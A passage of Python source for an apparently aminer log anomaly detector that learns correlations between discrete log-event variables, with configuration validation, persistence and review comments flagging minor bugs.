checked, with the selected methods. (See self.used_cor_meth) This module builds upon the event_type_detector.
""" time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, event_type_detector, persistence_id="Default", target_path_list=None, num_init=100, num_update=100, disc_div_thres=0.3, num_steps_create_new_rules=-1, num_upd_until_validation=20, num_end_learning_phase=-1, check_cor_thres=0.5, check_cor_prob_thres=1, check_cor_num_thres=10, min_values_cors_thres=5, new_vals_alarm_thres=3.5, num_bt=30, alpha_bt=0.1, used_homogeneity_test="Chi", alpha_chisquare_test=0.05, max_dist_rule_distr=0.1, used_presel_meth=None, intersect_presel_meth=False, percentage_random_cors=0.20, match_disc_vals_sim_tresh=0.7, exclude_due_distr_lower_limit=0.4, match_disc_distr_threshold=0.5, used_cor_meth=None, used_validate_cor_meth=None, validate_cor_cover_vals_thres=0.7, validate_cor_distinct_thres=0.05, ignore_list=None, constraint_list=None, learn_mode=True, stop_learning_time=None, stop_learning_no_anomaly_time=None, log_resource_ignore_list=None): """Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param event_type_detector used to track the number of occurring events. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered for value range generation. @param num_init minimal number of lines of one event type to initialize the correlation rules. @param num_update number of lines after the initialization after which the correlations are periodically tested and updated. @param disc_div_thres diversity threshold for variables to be considered discrete. @param num_steps_create_new_rules number of update steps, for which new rules are generated periodically. States False if rules should not be updated. 
@param num_upd_until_validation number of update steps, for which the rules are validated periodically.
@param num_end_learning_phase number of update steps until the update phase ends and the test phase begins; a negative value (the default -1) means the update phase never ends.
@param check_cor_thres threshold for the number of allowed different values of the distribution to be considered a correlation.
@param check_cor_prob_thres threshold for the difference of the probability of the values to be considered a correlation.
@param check_cor_num_thres number of allowed different values for the calculation if the distribution can be considered a correlation.
@param min_values_cors_thres minimal number of appearances of values on the left side to consider the distribution as a possible correlation.
@param new_vals_alarm_thres threshold which has to be exceeded by the number of new values divided by the number of old values to generate an alarm.
@param num_bt number of considered test-samples for the binomial test.
@param alpha_bt significance level for the binomial test on the test results.
@param used_homogeneity_test the homogeneity test used for the updates and tests of the correlations. The implemented methods are ["Chi", "MaxDist"]; any other name raises ValueError at construction.
@param alpha_chisquare_test significance level alpha for the chi-square test.
@param max_dist_rule_distr maximum distance between the distribution of the rule and the distribution of the read-in values before the rule fails.
@param used_presel_meth used preselection methods. The implemented methods are ["matchDiscDistr", "excludeDueDistr", "matchDiscVals", "random"]; an unknown name raises ValueError at construction.
@param intersect_presel_meth states if the intersection or the union of the possible correlations found by the used_presel_meth is used for the resulting correlations.
@param percentage_random_cors percentage of the randomly picked correlations of all possible ones in the preselection method random. Must lie strictly between 0 and 1; other values raise ValueError at construction.
@param match_disc_vals_sim_tresh similarity threshold for the preselection method pick_cor_match_disc_vals.
@param exclude_due_distr_lower_limit lower limit for the maximal appearance to one value of the distributions. If the maximal appearance is exceeded the variable is excluded.
@param match_disc_distr_threshold threshold for the preselection method pick_cor_match_disc_distr.
@param used_cor_meth used correlation detection methods. The implemented methods are ["Rel", "WRel"]; None or an empty list selects both.
@param used_validate_cor_meth used validation methods. The implemented methods are ["coverVals", "distinctDistr"]. If None, the default is ["coverVals", "distinctDistr"], reduced to ["coverVals"] when "WRel" is not in used_cor_meth. Explicitly requesting "distinctDistr" without "WRel" raises ValueError at construction.
@param validate_cor_cover_vals_thres threshold for the validation method coverVals. The higher the threshold the more correlations must be detected to be validated a correlation.
@param validate_cor_distinct_thres threshold for the validation method distinctDistr. The threshold states which value the variance of the distributions has to surpass to be considered real correlations. The lower the value the less likely that the correlations are being rejected.
@param ignore_list list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted.
@param constraint_list list of paths that have to be present in the log atom to be analyzed.
@param learn_mode specifies whether new values should be learned.
@param stop_learning_time switch the learn_mode to False once the atom time has advanced by this amount beyond the time of the first processed atom.
@param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time.
@param log_resource_ignore_list list of log resource names; atoms whose source.resource_name equals one of them are not processed.
""" # avoid "defined outside init" issue self.learn_mode, self.stop_learning_time, self.next_persist_time, self.log_success, self.log_total = [None]*5 self.stop_learning_time_initialized = None super().__init__( mutable_default_args=["target_path_list", "ignore_list", "constraint_list", "log_resource_ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, event_type_detector=event_type_detector, persistence_id=persistence_id, target_path_list=target_path_list, num_init=num_init, num_update=num_update, disc_div_thres=disc_div_thres, num_steps_create_new_rules=num_steps_create_new_rules, num_upd_until_validation=num_upd_until_validation, num_end_learning_phase=num_end_learning_phase, check_cor_thres=check_cor_thres, check_cor_prob_thres=check_cor_prob_thres, check_cor_num_thres=check_cor_num_thres, min_values_cors_thres=min_values_cors_thres, new_vals_alarm_thres=new_vals_alarm_thres, num_bt=num_bt, alpha_bt=alpha_bt, used_homogeneity_test=used_homogeneity_test, alpha_chisquare_test=alpha_chisquare_test, max_dist_rule_distr=max_dist_rule_distr, used_presel_meth=used_presel_meth, intersect_presel_meth=intersect_presel_meth, percentage_random_cors=percentage_random_cors, match_disc_vals_sim_tresh=match_disc_vals_sim_tresh, exclude_due_distr_lower_limit=exclude_due_distr_lower_limit, match_disc_distr_threshold=match_disc_distr_threshold, used_cor_meth=used_cor_meth, used_validate_cor_meth=used_validate_cor_meth, validate_cor_cover_vals_thres=validate_cor_cover_vals_thres, validate_cor_distinct_thres=validate_cor_distinct_thres, ignore_list=ignore_list, constraint_list=constraint_list, learn_mode=learn_mode, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time, log_resource_ignore_list=log_resource_ignore_list ) if not isinstance(self.event_type_detector, EventTypeDetector): msg = "event_type_detector must be an instance of EventTypeDetector." 
logging.getLogger(DEBUG_LOG_NAME).error(msg)
raise TypeError(msg)
# Register this detector with the ETD (the class docstring says the VCD builds on it;
# receive_atom reads the ETD's current_index and value lists) -- confirm in EventTypeDetector
# what add_following_modules does with the registration.
self.event_type_detector.add_following_modules(self)
# Reuse a VariableTypeDetector that is already attached to the same ETD; when present, its
# var_type entries are used instead of the heuristic discrete-variable selection in init_cor.
self.variable_type_detector = None
if any(self.event_type_detector.following_modules[j].__class__.__name__ == "VariableTypeDetector" for j in range(
        len(self.event_type_detector.following_modules))):
    try:
        self.variable_type_detector = self.event_type_detector.following_modules[next(j for j in range(
            len(self.event_type_detector.following_modules))
            if self.event_type_detector.following_modules[j].__class__.__name__ == "VariableTypeDetector")]
    except StopIteration:
        pass  # unreachable: the any() guard above already found a matching module
# NOTE: the two blocks below mutate the shared EventTypeDetector instance. Every other detector
# that uses the same ETD sees the raised min_num_vals / max_num_vals as well; the change is
# only reported via the debug log and stderr.
if self.event_type_detector.min_num_vals < max(num_init, num_update):
    msg = f"Changed the parameter min_num_vals of the ETD from {self.event_type_detector.min_num_vals} to " \
          f"{max(num_init, num_update)} to prevent errors in the execution of the VCD"
    logging.getLogger(DEBUG_LOG_NAME).warning(msg)
    print("WARNING: " + msg, file=sys.stderr)
    self.event_type_detector.min_num_vals = max(num_init, num_update)
if self.event_type_detector.max_num_vals < max(num_init, num_update) + 500:
    msg = f"Changed the parameter max_num_vals of the ETD from {self.event_type_detector.max_num_vals} to " \
          f"{max(num_init, num_update) + 500} to prevent errors in the execution of the VCD"
    logging.getLogger(DEBUG_LOG_NAME).warning(msg)
    print("WARNING: " + msg, file=sys.stderr)
    self.event_type_detector.max_num_vals = max(num_init, num_update) + 500
# Validate the configured method names up front so a typo in the configuration fails at
# startup instead of silently selecting no method at analysis time.
if self.used_homogeneity_test not in ["Chi", "MaxDist"]:
    raise ValueError(f"The homogeneity test '{used_homogeneity_test}' does not exist!")
if self.used_presel_meth is None:
    self.used_presel_meth = []
for presel_meth in self.used_presel_meth:
    if presel_meth not in ["matchDiscDistr", "excludeDueDistr", "matchDiscVals", "random"]:
        raise ValueError(f"The preselection method '{presel_meth}' does not exist!")
# NOTE(review): the message below is never %-formatted, so the literal "%f" ends up in the
# exception text instead of the configured value. The range check also does not depend on
# whether "random" is actually among used_presel_meth.
if self.percentage_random_cors <= 0. or self.percentage_random_cors >= 1.:
    raise ValueError("The Random preselection method makes no sense if percentage_random_cors = %f. If the percentage_random_cors"
                     " is >= 1.0 better use no preselection method for that case.")
if self.used_cor_meth is None or self.used_cor_meth == []:
    self.used_cor_meth = ["Rel", "WRel"]
for cor_meth in self.used_cor_meth:
    if cor_meth not in ["Rel", "WRel"]:
        raise ValueError(f"The correlation rule '{cor_meth}' does not exist!")
if self.used_validate_cor_meth is None:
    self.used_validate_cor_meth = ["coverVals", "distinctDistr"]
    # The distinctDistr validation requires the "WRel" method.
    if "WRel" not in self.used_cor_meth:
        self.used_validate_cor_meth = ["coverVals"]
for validate_cor_meth in self.used_validate_cor_meth:
    if validate_cor_meth not in ["coverVals", "distinctDistr"]:
        raise ValueError(f"The validation correlation rule '{validate_cor_meth}' does not exist!")
# An explicitly configured distinctDistr without WRel is a hard configuration error rather
# than being silently downgraded like the default above.
if "WRel" not in self.used_cor_meth and "distinctDistr" in self.used_validate_cor_meth:
    raise ValueError("The 'distinctDistr' validation correlation rule requires the 'WRel' correlation method!")
# Calculate the minimal number of successes for the BT
self.min_successes_bt = self.bt_min_successes(self.num_bt, 1 - self.alpha_bt, self.alpha_bt)
self.update_rules = []  # List which states for what event types the rules are updated
self.generate_rules = []  # List which states for what event types new rules are being generated
# NOTE(review): this assignment overwrites the value computed by bt_min_successes() a few
# lines above with 0. Unless bt_min_successes() stores its result elsewhere, the binomial
# test threshold used later is 0 instead of the computed minimum -- confirm which is intended.
self.min_successes_bt = 0  # Minimal number of successes for the binomialtest
self.discrete_indices = []  # List of the indices to every event type which are assumed to be discrete
self.pos_var_val = []  # List of the possible values to the single variables of the event types
self.pos_var_cor = []  # List of all pairs of variables of the event types which are assumed to be correlated
self.rel_list = []  # List of lists, that saves the data for the found correlations with the method Rel.
# First index states the event_index, second index states which correlation is examined, third index states which direction of the # correlation is examined, fourth index states the value of the first variable and the fifth value states the value of the second # variable. The content is the number of appearance in the log lines. self.w_rel_list = [] # List of lists, that saves the data for the correlation finding with WRel. # First index states the event_index, second index states which correlation is examined, third index states which direction of the # correlation is examined, fourth index states the value of the first variable and the fifth value states the value of the second # variable. The content is the number of appearance in the log lines. self.w_rel_num_ll_to_vals = [] # List of the number of lines in which the values of the first variable have appeared self.w_rel_ht_results = [] # List of the results of the homogeneity tests for the binomial test self.w_rel_confidences = [] # List for the confidences of the homogeneity tests self.initialized = [] # List that states if the single event types have been initialized at least once self.log_atom = None # Loads the persistence self.persistence_id = persistence_id self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) # Imports the persistence if self.event_type_detector.load_persistence_data is True self.load_persistence_data() def receive_atom(self, log_atom): """Receive an parsed atom and the information about the parser match. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. 
""" for source in self.log_resource_ignore_list: if log_atom.source.resource_name == source: return False event_index = self.event_type_detector.current_index if event_index == -1: return False if not self.stop_learning_time_initialized: self.stop_learning_time_initialized = True if self.stop_learning_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_time elif self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time if self.learn_mode is True and self.stop_learning_time is not None and self.stop_learning_time < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False parser_match = log_atom.parser_match for ignore_path in self.ignore_list: if ignore_path in parser_match.get_match_dictionary().keys(): return False constraint_path_flag = False for constraint_path in self.constraint_list: if parser_match.get_match_dictionary().get(constraint_path) is not None: constraint_path_flag = True break if not constraint_path_flag and self.constraint_list != []: return False self.log_atom = log_atom if self.event_type_detector.num_event_lines[event_index] >= self.num_init and ( len(self.initialized) <= event_index or not self.initialized[event_index]): # Initialisation Phase self.init_cor(event_index) # Initialise the correlations if self.update_rules[event_index] and self.learn_mode: self.validate_cor() # Validate the correlations and removes the cors, which fail the requirements if self.stop_learning_time is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_time = log_atom.atom_time + self.stop_learning_no_anomaly_time # Print the found correlations if "Rel" in self.used_cor_meth: self.print_ini_rel(event_index) if "WRel" in self.used_cor_meth: self.print_ini_w_rel(event_index) # Updates or tests the correlations elif 
self.event_type_detector.num_event_lines[event_index] > self.num_init and \ (self.event_type_detector.num_event_lines[event_index] - self.num_init) % self.num_update == 0: # Checks if the correlations should be updated or tested if self.num_end_learning_phase < 0 or self.event_type_detector.num_event_lines[event_index]-self.num_init <= \ (self.num_update*self.num_end_learning_phase): # Update Phase self.update_rules[event_index] = True if self.num_steps_create_new_rules > 0 and ((self.event_type_detector.num_event_lines[ event_index]-self.num_init) / self.num_update) % self.num_steps_create_new_rules == 0: # generate new rules self.generate_rules[event_index] = True else: self.generate_rules[event_index] = False else: # Test Phase self.update_rules[event_index] = False self.generate_rules[event_index] = False # Updates or tests the correlations self.update_or_test_cor(event_index) if self.generate_rules[event_index] and ((self.event_type_detector.num_event_lines[ event_index] - self.num_init) / self.num_update / self.num_steps_create_new_rules) % self.num_upd_until_validation == 0: self.validate_cor() # Validate the correlations and removes the cors, which fail the requirements return True def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = trigger_time + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persistence_data = [self.pos_var_cor, self.pos_var_val, self.discrete_indices, self.update_rules, self.generate_rules, self.rel_list, self.w_rel_list, self.w_rel_num_ll_to_vals, self.w_rel_ht_results, self.w_rel_confidences] 
PersistenceUtil.store_json(self.persistence_file_name, persistence_data) def load_persistence_data(self): """Extract the persistence data and appends various lists to create a consistent state.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: self.pos_var_cor = persistence_data[0] self.pos_var_val = persistence_data[1] self.discrete_indices = persistence_data[2] self.update_rules = persistence_data[3] self.generate_rules = persistence_data[4] self.rel_list = persistence_data[5] self.w_rel_list = persistence_data[6] self.w_rel_num_ll_to_vals = persistence_data[7] self.w_rel_ht_results = persistence_data[8] self.w_rel_confidences = persistence_data[9] self.initialized = [False for _ in self.pos_var_cor] for event_index, indices in enumerate(self.discrete_indices): if len(indices) > 0: self.initialized[event_index] = True def init_cor(self, event_index): """Initialise the possible correlations and runs the init-functions for the methods in self.used_cor_meth.""" # Append the supporting lists if necessary if len(self.pos_var_cor) < event_index+1: for i in range(event_index + 1 - len(self.pos_var_cor)): self.pos_var_cor.append([]) self.pos_var_val.append([]) self.discrete_indices.append([]) self.update_rules.append(True) self.generate_rules.append(True) self.initialized.append(False) self.initialized[event_index] = True # Initialise the indices to the assumed discrete variables if len(self.discrete_indices[event_index]) == 0: # If the var_typeD is linked, append the discrete fields if self.variable_type_detector is not None: for i in range(len(self.event_type_detector.variable_key_list[event_index])): if len(self.variable_type_detector.var_type[event_index][i]) > 0 and \ self.variable_type_detector.var_type[event_index][i][0] == "d" and ( self.target_path_list == [] or self.event_type_detector.variable_key_list[event_index][i] in self.target_path_list): self.discrete_indices[event_index].append(i) 
self.pos_var_val[event_index].append(self.variable_type_detector.var_type[event_index][i][1]) # Else use the variables which are neither unique nor static # !!! else: self.discrete_indices[event_index] = [ var_index for var_index in range(len(self.event_type_detector.variable_key_list[event_index])) if self.target_path_list == [] or self.event_type_detector.variable_key_list[event_index][var_index] in self.target_path_list] for i in range(len(self.event_type_detector.values[event_index]) - 1, -1, -1): tmp_list = list(set(self.event_type_detector.values[event_index][i][-self.num_init:])) if len(tmp_list) == 1 or (len(tmp_list) > self.disc_div_thres * self.num_init): del self.discrete_indices[event_index][i] else: self.pos_var_val[event_index].append(tmp_list) self.pos_var_val[event_index].reverse() # Initialise the list of the possible correlations # If no preselection method is used all discrete variables are matched with each other if not self.used_presel_meth: self.pos_var_cor[event_index] = [[i, j] for i in range(len(self.discrete_indices[event_index])) for j in range( i+1, len(self.discrete_indices[event_index]))] # Else the preselection methods are used to generate the list of possible correlations else: first_run = True # Only used if the interception of the preselected possible correlations are further analysed # Generate the possible correlations for the preselection methods for meth in self.used_presel_meth: tmp_pos_var_cor = [] # List of the possible correlations for one preselection method if self.variable_type_detector is None: variable_values = [[] for _ in range(len(self.discrete_indices[event_index]))] variable_distributions = [[] for _ in range(len(self.discrete_indices[event_index]))] for i, val in enumerate(self.discrete_indices[event_index]): for j in range(-1, -self.num_init-1, -1): if self.event_type_detector.values[event_index][val][j] not in variable_values[i]: variable_values[i].append(self.event_type_detector.values[event_index][val][j]) 
variable_distributions[i].append(1) else: variable_distributions[i][variable_values[i].index(self.event_type_detector.values[event_index][ val][j])] += 1 tmp_sum = sum(variable_distributions[i]) variable_distributions[i] = [variable_distributions[i][j]/tmp_sum for j in range( len(variable_distributions[i]))] if meth == "excludeDueDistr": useable_indices = [] # list of the indices, which are not excluded if self.variable_type_detector is not None: for i, val in enumerate(self.discrete_indices[event_index]): if self.pick_cor_exclude_due_distr(self.variable_type_detector.var_type[event_index][val][2]): # Add the index to the list of useable indices if it is not excluded useable_indices.append(i) else: for i in range(len(self.discrete_indices[event_index])): if self.pick_cor_exclude_due_distr(variable_distributions[i]): # Add the index to the list of useable indices if it is not excluded useable_indices.append(i) tmp_pos_var_cor = [[i, j] for i in useable_indices for j in useable_indices if i < j] elif meth == "matchDiscDistr": if self.variable_type_detector is not None: for i, val in enumerate(self.discrete_indices[event_index]): for j in range(i+1, len(val)): if self.pick_cor_match_disc_distr(self.variable_type_detector.var_type[event_index][ val][2], self.variable_type_detector.var_type[event_index][ self.discrete_indices[event_index][j]][2]): # If self.pick_cor_match_disc_distr returned True the indices are being appended tmp_pos_var_cor.append([i, j]) else: for i in range(len(self.discrete_indices[event_index])): for j in range(i+1, len(self.discrete_indices[event_index])): if self.pick_cor_match_disc_distr(variable_distributions[i], variable_distributions[j]): # If self.pick_cor_match_disc_distr returned True the indices are being appended tmp_pos_var_cor.append([i, j]) elif meth == "matchDiscVals": if self.variable_type_detector is not None: for i, val in enumerate(self.discrete_indices[event_index]): for j in range(i+1, len(self.discrete_indices[event_index])): 
if self.pick_cor_match_disc_vals(self.variable_type_detector.var_type[event_index][ val][1], self.variable_type_detector.var_type[event_index][ self.discrete_indices[event_index][j]][1]): # If self.pick_cor_match_disc_vals returned True the indices are being appended tmp_pos_var_cor.append([i, j]) else: for i in range(len(self.discrete_indices[event_index])): for j in range(i+1, len(self.discrete_indices[event_index])): if self.pick_cor_match_disc_vals(variable_values[i], variable_values[j]): # If self.pick_cor_match_disc_vals returned True the indices are being appended tmp_pos_var_cor.append([i, j]) elif meth == "random": tmp_pos_var_cor = self.pick_cor_random(event_index) # Initialize, append or intercept self.pos_var_cor with tmp_pos_var_cor # Initialize self.pos_var_cor if first_run: first_run = False self.pos_var_cor[event_index] = tmp_pos_var_cor # Intercept self.pos_var_cor elif self.intersect_presel_meth: for i in range(len(self.pos_var_cor[event_index]) - 1, -1, -1): if self.pos_var_cor[event_index][i] not in tmp_pos_var_cor: del self.pos_var_cor[event_index][i] # Append self.pos_var_cor else: for cor in tmp_pos_var_cor: if cor not in self.pos_var_cor[event_index]: self.pos_var_cor[event_index].append(cor) # Initialise the correlation methods for meth in self.used_cor_meth: if meth == "Rel": self.init_cor_rel(event_index) elif meth == "WRel": self.init_cor_w_rel(event_index) def init_cor_rel(self, event_index): """Initialize supporting lists for the method "Rel".""" # Initialise self.rel_list if len(self.rel_list) < event_index+1: for i in range(event_index + 1 - len(self.rel_list)): self.rel_list.append([]) if len(self.rel_list[event_index]) == 0: for i in range(len(self.pos_var_cor[event_index])): self.rel_list[event_index].append([{}, {}]) # Only calculate the correlations once, because the used method allows to efficiently calculate both directions in parallel for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]): i = 
pos_var_cor_val[0] # Index of the first variable in discrete_indices j = pos_var_cor_val[1] # Index of the second variable in discrete_indices for k in range(-1, -self.num_init-1, -1): # k-th value of the i-th variable i_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] # k-th value of the j-th variable j_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][j]][k] # Check if i_val has not appeared previously if i_val not in self.rel_list[event_index][pos_var_cor_index][0]: # Add the relation i=i_val -> j=j_val self.rel_list[event_index][pos_var_cor_index][0][i_val] = {j_val: 1} # If the j_val has already appeared, then the var i had another value than i_val, # therefore the relation j:j_val -> i:i_val is not possible if j_val in self.rel_list[event_index][pos_var_cor_index][1]: del self.rel_list[event_index][pos_var_cor_index][1][j_val] # Else add the relation j=j_val -> i=i_val else: self.rel_list[event_index][pos_var_cor_index][1][j_val] = {i_val: 1} continue # Check if j_val has not appeared previously if j_val not in self.rel_list[event_index][pos_var_cor_index][1]: # Add the relation j=j_val -> i=i_val self.rel_list[event_index][pos_var_cor_index][1][j_val] = {i_val: 1} # i=i_val -> j=j_val is not possible del self.rel_list[event_index][pos_var_cor_index][0][i_val] continue # At least two possible values, therefore delete the relation if self.rel_list[event_index][pos_var_cor_index][0][i_val] != {} and j_val not in self.rel_list[event_index][ pos_var_cor_index][0][i_val]: del self.rel_list[event_index][pos_var_cor_index][0][i_val] # At least two possible values, therefore delete the relation if self.rel_list[event_index][pos_var_cor_index][1][j_val] != {} and i_val not in self.rel_list[event_index][ pos_var_cor_index][1][j_val]: del self.rel_list[event_index][pos_var_cor_index][1][j_val] # Update the appearance of the relation if (i_val in 
self.rel_list[event_index][pos_var_cor_index][0]) and (j_val in self.rel_list[event_index][ pos_var_cor_index][0][i_val]): self.rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += 1 if (j_val in self.rel_list[event_index][pos_var_cor_index][1]) and (i_val in self.rel_list[event_index][ pos_var_cor_index][1][j_val]): self.rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += 1 def init_cor_w_rel(self, event_index): """Initialize w_rel_list and runs init_single_cor_w_rel for the chosen indices.""" # Append the w_rel_list and w_rel_num_ll_to_vals if necessary if len(self.w_rel_list) < event_index+1: for _ in range(event_index + 1 - len(self.w_rel_list)): self.w_rel_list.append([]) self.w_rel_num_ll_to_vals.append([]) if len(self.w_rel_list[event_index]) == 0: for _ in range(len(self.pos_var_cor[event_index])): self.w_rel_list[event_index].append([{}, {}]) self.w_rel_num_ll_to_vals[event_index].append([{}, {}]) # Only initialize the correlations once, because the used method allows to efficiently calculate both directions in parallel for pos_var_cor_index in range(len(self.pos_var_cor[event_index])): self.init_single_cor_w_rel(event_index, pos_var_cor_index) def init_single_cor_w_rel(self, event_index, pos_var_cor_index): """Initialize the first entries of w_rel_list.""" i = self.pos_var_cor[event_index][pos_var_cor_index][0] # Index of the first variable in discrete_indices j = self.pos_var_cor[event_index][pos_var_cor_index][1] # Index of the second variable in discrete_indices for k in range(-1, -self.num_init-1, -1): # k-th value of the i-th variable i_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] # k-th value of the j-th variable j_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][j]][k] # Updating both lists in w_rel_list[event_index][pos_var_cor_index] and w_rel_num_ll_to_vals[event_index][pos_var_cor_index] # Add an entry for i_val if necessary if i_val not in 
self.w_rel_list[event_index][pos_var_cor_index][0]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] = 1 else: self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] += 1 # Add an entry for j_val if necessary if j_val not in self.w_rel_list[event_index][pos_var_cor_index][1]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val] = {} self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] = 1 else: self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] += 1 # Add the entries for j_val if j_val not in self.w_rel_list[event_index][pos_var_cor_index][0][i_val]: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] = 1 # Or update the appearance of the relation else: self.w_rel_list[event_index][pos_var_cor_index][0][i_val][j_val] += 1 # Add the entries for i_val if i_val not in self.w_rel_list[event_index][pos_var_cor_index][1][j_val]: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] = 1 # Or update the appearance of the relation else: self.w_rel_list[event_index][pos_var_cor_index][1][j_val][i_val] += 1 # Removes the entries of w_rel_list[event_index][pos_var_cor_index] which can not be considered possible correlations # Generate the list of entries in i, which should be deleted delete_i_vals = [i_val for i_val in self.w_rel_list[event_index][pos_var_cor_index][0] if not ( self.check_cor_w_rel(self.w_rel_list[event_index][pos_var_cor_index][0][i_val].values(), len( self.pos_var_val[event_index][j])))] # Delete entries of i for i_val in delete_i_vals: del self.w_rel_list[event_index][pos_var_cor_index][0][i_val] del self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][0][i_val] # Generate the list of entries in j, which should be deleted delete_j_vals = [j_val for j_val in self.w_rel_list[event_index][pos_var_cor_index][1] if not ( 
self.check_cor_w_rel(self.w_rel_list[event_index][pos_var_cor_index][1][j_val].values(), len( self.pos_var_val[event_index][i])))] # Delete entries of j for j_val in delete_j_vals: del self.w_rel_list[event_index][pos_var_cor_index][1][j_val] del self.w_rel_num_ll_to_vals[event_index][pos_var_cor_index][1][j_val] def update_or_test_cor(self, event_index): """Update or test the possible correlations and removes the false ones.""" for meth in self.used_cor_meth: if meth == "Rel": self.update_or_test_cor_rel(event_index) elif meth == "WRel": self.update_or_test_cor_w_rel(event_index) def update_or_test_cor_rel(self, event_index): """Update or test the rel_list.""" for pos_var_cor_index, pos_var_cor_val in enumerate(self.pos_var_cor[event_index]): i = pos_var_cor_val[0] # Index of the first variable in discrete_indices j = pos_var_cor_val[1] # Index of the second variable in discrete_indices if self.update_rules[event_index] and self.learn_mode: # Update both list in rel_list[event_index][pos_var_cor_index] and create new rules if self.generate_rules[event_index] # is True message = f"New values appeared after the {self.event_type_detector.total_records}-th line in correlation(s) of the event" \ f" {self.event_type_detector.get_event_type(event_index)}" confidence = 0 total_correlations = len([None for _ in self.rel_list[event_index][pos_var_cor_index][0]]) + len( [None for _ in self.rel_list[event_index][pos_var_cor_index][1]]) sorted_log_lines = [] event_data = {"EventIndex": event_index} affected_log_atom_paths = [] value_changes = [] if self.generate_rules[event_index]: failed_i_vals = [] failed_j_vals = [] new_i_vals = [] new_j_vals = [] for k in range(-1, -self.num_update-1, -1): # k-th value of the i-th variable i_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][i]][k] # k-th value of the j-th variable j_val = self.event_type_detector.values[event_index][self.discrete_indices[event_index][j]][k] # Check if i_val has not 
appeared previously and appends the message to string or save the index in failed_i_vals # if the correlation was violated if i_val not in self.rel_list[event_index][pos_var_cor_index][0] and self.generate_rules[event_index]: # Add the relation i=i_val -> j=j_val self.rel_list[event_index][pos_var_cor_index][0][i_val] = {j_val: 0} new_i_vals.append(i_val) elif i_val in self.rel_list[event_index][pos_var_cor_index][0] and j_val not in self.rel_list[event_index][ pos_var_cor_index][0][i_val]: if not self.generate_rules[event_index] or i_val not in new_i_vals: sorted_log_lines.append( "New value occurred in correlation of the paths %s = %s -> %s = old value: %s / New appeared value: %s" % ( self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[0]]], repr(i_val), self.event_type_detector.variable_key_list[event_index][self.discrete_indices[event_index][ pos_var_cor_val[1]]], repr(list(self.rel_list[event_index][ pos_var_cor_index][0][i_val].keys())[0]), repr(j_val))) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[0]]]) affected_log_atom_paths.append(self.event_type_detector.variable_key_list[event_index][self.discrete_indices[ event_index][pos_var_cor_val[1]]]) change = {"OldValue": repr(list(self.rel_list[event_index][pos_var_cor_index][0][i_val].keys())[0]), "NewValue": repr(j_val)} value_changes.append(change) del self.rel_list[event_index][pos_var_cor_index][0][i_val] confidence += 1 / total_correlations if self.generate_rules[event_index] and i_val not in failed_i_vals: failed_i_vals.append(i_val) # Check if j_val has not appeared previously and appends the message to string or save the index in failed_j_vals if # the correlation was violated if j_val not in self.rel_list[event_index][pos_var_cor_index][1] and self.generate_rules[event_index]: # Add the relation j=j_val -> i=i_val 
